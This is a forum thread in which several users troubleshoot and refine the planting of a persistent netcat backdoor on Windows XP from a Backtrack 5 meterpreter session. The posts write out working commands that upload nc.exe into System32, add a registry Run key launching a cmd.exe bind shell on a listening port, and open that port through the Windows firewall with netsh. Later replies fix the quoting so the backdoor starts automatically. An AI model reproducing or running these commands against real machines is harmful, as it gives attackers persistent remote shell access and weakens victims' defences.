Results 1 to 8 of 8

Thread: Backtrack 5- netcat/backdoor

  1. #1
    Join Date
    May 2011
    Posts
    129

    Backtrack 5- netcat/backdoor

    Hello everyone I’m trying backtrack 5 kde version guides on upload netcat backdoor. That I have productively tested in backtrack 3 and backtrack 4 and that time it work. Now I have trouble in backtrack 5 my laboratory is backtrack 5 host, windows xp sp3 and virtual vista. When im obtains a meterpreter shell and running the command that time the whole thing look flawlessly but when I get call of netcat connection my connected refuses. My commands are as follows
    Code:
    *meterpreter> upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK!
    *meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!
    *meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!
    Successful set CIAUZ.
    *meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!

  2. #2
    Join Date
    May 2008
    Posts
    991

    Re: Backtrack 5- netcat/backdoor

    Reply 1
    Next, we require modifying the system to permit remote connections all the way through the firewall to our netcat backdoor. For this:
    Code:
    meterpreter > execute -f cmd -i
    
    Process 1604 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\Victim\My Documents > netsh firewall show opmode
    Netsh firewall show opmode
    
    C:\Documents and Settings\Victim\My Documents > netsh firewall add portopening TCP 1111 "Service Firewall" ENABLE ALL
    
    C:\Documents and Settings\Victim\My Documents > netsh firewall show portopening

  3. #3
    Join Date
    Nov 2009
    Posts
    1,035

    Re: Backtrack 5- netcat/backdoor

    So whenever you do netstat on the system you are "attacking" you will see netcat listening to this port 1111.netcat always doesn’t uses this port.in netcat you got option to provide the port number where u want your backdoor to run. Whenever u run netcat you’re backdoor must be there in his system taskbar. It must exist within C:\\WINDOWS\\SYSTEM32\\ wherever you upload it. If you check event viewer on the victim system where you can check the backdoor.

  4. #4
    Join Date
    May 2008
    Posts
    859

    Re: Backtrack 5- netcat/backdoor

    I’m happy: bt5 >xp sp3 virtual
    Code:
    reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!!!
    in the victim(xp) look in regedit:
    CIAUZ REG_SZ C:WINDOWSsystem32nc.exe -L -d -p 1111 here is error!
    i'm correctly with my hand dx :
    CIAUZ REG_SZ C:\WINDOWS\system32\nc.exe -L -d -p 1111 IT'S WORK NOW

  5. #5
    Join Date
    Apr 2009
    Posts
    970

    Re: Backtrack 5- netcat/backdoor

    All my firewall and antivirus are disabled! (router.host, virtual)! for my bad experience
    I think the problem might be caused by Metasploit (meterpreter), because the command
    Code:
    reg setval -k HKLM\\Software\\Microsoft\\Windows\\Current Version \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe"
    But in victimpc nc.exe does not start automatically because it is a mistake to slash \ \ \ result: in the victim (xp) look in regedit:
    Ciauz REG_SZ C: WINDOWSsystem32nc.exe-L-d-p 1111 error is here!

  6. #6
    Join Date
    May 2008
    Posts
    2,680

    Re: Backtrack 5- netcat/backdoor

    I have been testing this as well. Using Backtrack 5 - 32bit - Gnome and the Victim machine is XP SP3 (Not Virtual).
    I'm experiencing the similar thing as you absent \ from the registry value

    Code:
    "c:\windows\system32\nc.exe......."
    I have noticed though, that if you set the registry key like this;

    Code:
    regsetval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run - backdoor -d C:\\Windows\\system32\\nc.exe
    You will see the registry value is correct, c:\windows\system32\nc.exe
    But as quickly as you use the " " to put up the spaces you lose the \ slashes. I will be keep playing with netcat.

  7. #7
    Join Date
    Apr 2010
    Posts
    173

    Re: Backtrack 5- netcat/backdoor

    This is how I managed to get it to work on my setup;

    Code:
    reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v BACKDOOR -d C:\\Windows\\System32\\nc.exe" -ldp 4144 -e cmd.exe"
    I just moved the position of the " " .Maybe this will work for you also.

  8. #8
    Join Date
    Nov 2009
    Posts
    1,292

    Re: Backtrack 5- netcat/backdoor

    I will surely try this commands on my home pc once I reach home now im out. tonight I think all your command will work (maybe in my a variety of tests I ‘have already used this kind of similar commands!) the actuality remains that years after you run the similar commands by heart by now you must now change! For my lack of experience seems to be a difficulty meterpreter shell. Above information was surely helpful.

Similar Threads

  1. How to upgrade from Backtrack 4 to Backtrack 5
    By Upendra in forum Operating Systems
    Replies: 6
    Last Post: 09-07-2011, 08:52 PM
  2. How to fix BackDoor-DNW.dr virus
    By Abbiey in forum Networking & Security
    Replies: 4
    Last Post: 21-04-2010, 04:34 AM
  3. Port redirection with Netcat
    By spuff in forum Networking & Security
    Replies: 5
    Last Post: 10-03-2010, 08:06 PM
  4. Remove : BackDoor-CEP.gen
    By Gavyn in forum Networking & Security
    Replies: 4
    Last Post: 04-02-2010, 11:00 PM
  5. How to remove BackDoor-DKI.gen.ba
    By Sandy22 in forum Networking & Security
    Replies: 5
    Last Post: 31-12-2009, 06:19 AM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Page generated in 1,711,666,907.73231 seconds with 17 queries